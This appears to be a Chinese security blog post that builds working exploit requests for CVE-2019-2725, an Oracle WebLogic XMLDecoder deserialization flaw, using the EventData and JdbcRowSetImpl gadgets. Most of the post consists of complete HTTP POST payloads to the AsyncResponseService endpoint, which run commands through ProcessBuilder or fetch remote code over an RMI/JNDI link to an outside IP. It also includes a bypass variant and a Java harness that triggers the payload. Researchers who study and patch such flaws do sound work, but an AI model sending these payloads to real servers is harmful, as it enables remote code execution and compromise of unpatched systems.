zoukankan      html  css  js  c++  java
  • # CVE-2019-2725二次反序列化EventData Gadget POC/JdbcRowSetImpl POC构造

    CVE-2019-2725二次反序列化EventData Gadget POC

    构造MapMsgEntity POC时会爆如下错误,原因畅师傅已经说了,当前类不是public
    Alt text
    具体想跟一下怎么报错的,可以这样操作,报错代码如下:

    java.lang.NoSuchMethodException: <unbound>=Class.new(byteArray);
    

    全局搜索NoSuchMethodException,直到执行到这个地方,从调用栈回溯,追踪一下就ok了。
    Alt text
    漏洞代码如下:
    Alt text
    POC如下,不知道EventData类传递string类型的参数怎么写。怼出如下数据包了,能够执行命令,这里是一个坑点,还得看下大佬怎么构造的poc

    POST /_async/AsyncResponseService HTTP/1.1
    Host: 121.195.170.96:7001
    Accept-Encoding: gzip, deflate
    SOAPAction: 
    Accept: */*
    User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
    Connection: keep-alive
    content-type: text/xml
    Content-Length: 885
    
    
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">      
    <java><class><string>org.slf4j.ext.EventData</string><void>
    <array class="java.lang.String" length="1">
      <void index="0">
       <string>"<java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array><void method="start" /></object></java>"</string>
      </void>
     </array>
    </void></class>
    </java>
     </work:WorkContext>
     </soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
    
    

    运行如下代码就能执行命令

    package weblogic;
    import java.beans.XMLDecoder;
    import java.io.ByteArrayInputStream;
    import java.io.File;
    import java.io.IOException;
    public class Test {
        //ByteArrayInputStream本身操作的是一个数组,并没有打开文件描述之类的,所有不需要关闭流
    
        public static void main(String[] args) {
            ByteArrayInputStream bais=null;
            StringBuilder sb=new StringBuilder();
            int temp=0;
            int num=0;
            long date1=System.currentTimeMillis();
            try{
    
                //bais也就是我们构造好的payload
                bais=new ByteArrayInputStream("<java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array><void method="start" /></object></java>".getBytes());
                XMLDecoder decoder = new XMLDecoder(bais);
                decoder.readObject();
                while((temp=bais.read())!=-1){
                    sb.append((char)temp);
                    num++;
                }
                System.out.println(sb);
                System.out.println("读取的字节数:"+num);
            }finally{
                try{
                    bais.close();//不需要关闭流的,但是调用close没有任何影响,close不做任何事情
                }catch(IOException e){
                    e.printStackTrace();
                }
                new File("d:"+File.separator+"a.txt");//File.separator是一个文件分隔符,在windows和linux平台下运行都没有问题
            }
            long date2=System.currentTimeMillis();
            System.out.println("耗时:"+(date2-date1));
    
        }
    
    }
    

    Alt text
    调试的时候发现代码执行不到.
    真的很迷,上面poc怎么弹的计算器都不知道。最终Poc如下,原来参数可以放在这里<void><string><![CDATA[POC]]></string></void>

    POST /_async/AsyncResponseService HTTP/1.1
    Host: 121.195.170.96:7001
    Accept-Encoding: gzip, deflate
    SOAPAction: 
    Accept: */*
    User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
    Connection: keep-alive
    content-type: text/xml
    Content-Length: 801
    
    
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">      
    <java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array><void method="start" /></object></java>]]></string>
    </void></class>
    </java>
     </work:WorkContext>
     </soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
    

    代码最终来到这里,RCE.
    Alt text
    还有com.sun.rowset.JdbcRowSetImpl类最后一个POC编写,一定要搞出来啊。

    CVE-2019-2725二次反序列化JdbcRowSetImpl Gadget POC构造

    jdk1.6没有property标签,jdk 1.7以上可以使用。因为绕过需要用到property标签赋值,只能用于weblogic12版本,weblogic10.3.6版本会爆如下错误:

    java.lang.Exception: Unrecognized opening tag: property name="dataSourceName"
    Continuing ...
    java.lang.Exception: Unrecognized closing tag: property
    Continuing ...
    java.lang.Exception: Unrecognized opening tag: property name="autoCommit"
    Continuing ...
    java.lang.Exception: Unrecognized closing tag: property
    Continuing ...
    java.lang.NoSuchMethodException: <unbound>=Class.new("rmi://localhost:9999/aa", Boolean);
    

    POC如下:

    POST /_async/AsyncResponseService HTTP/1.1
    Host: 121.195.170.96:7001
    Accept-Encoding: gzip, deflate
    SOAPAction: 
    Accept: */*
    User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
    Connection: keep-alive
    content-type: text/xml
    Content-Length: 694
    
    
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">      
    <java><class><string>com.sun.rowset.JdbcRowSetImpl</string><void>
    <property name="dataSourceName"><string>rmi://localhost:9999/aa</string></property><property name="autoCommit"><boolean>true</boolean></property>
    </void></class>
    </java>
     </work:WorkContext>
     </soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
    

    property标签代替<void property="">
    之前的POC

        <void class="com.sun.rowset.JdbcRowSetImpl">
            <void property="dataSourceName">
             <string>rmi://121.195.170.127:2222/aa</string>
            </void>
            <void property="autoCommit">
                <boolean>true</boolean>
            </void>
        </void>
    </java>
    

    绕过的POC

    <java>
    <class>
    <string>com.sun.rowset.JdbcRowSetImpl</string>
    <void>
    	<property name="dataSourceName"><string>rmi://localhost:9999/aa</string>
    	</property>
    	<property name="autoCommit">
    	<boolean>true</boolean>
    	</property>
    </void>
    </class>
    </java>
    

    漏洞就不调试了,看我之前写过的https://www.cnblogs.com/afanti/p/10222293.html
    Alt text
    参考链接:
    https://paper.seebug.org/909/
    给XML的property属性赋value

  • 相关阅读:
    奥东......NGUI Scroll View
    奥东......Unity中小技巧
    java-web 小知识点
    奥东here......Unity中的协程
    JAVA 犯错汇总
    python 模拟 java hashcode
    pyqt文件转换成python代码
    loadrunner 运行javavuser报错Failed to get JRE version解决方法
    python 实现 loadrunner xml脚本格式化
    loadrunner web_custom_request 脚本处理
  • 原文地址:https://www.cnblogs.com/afanti/p/10816028.html
Copyright © 2011-2022 走看看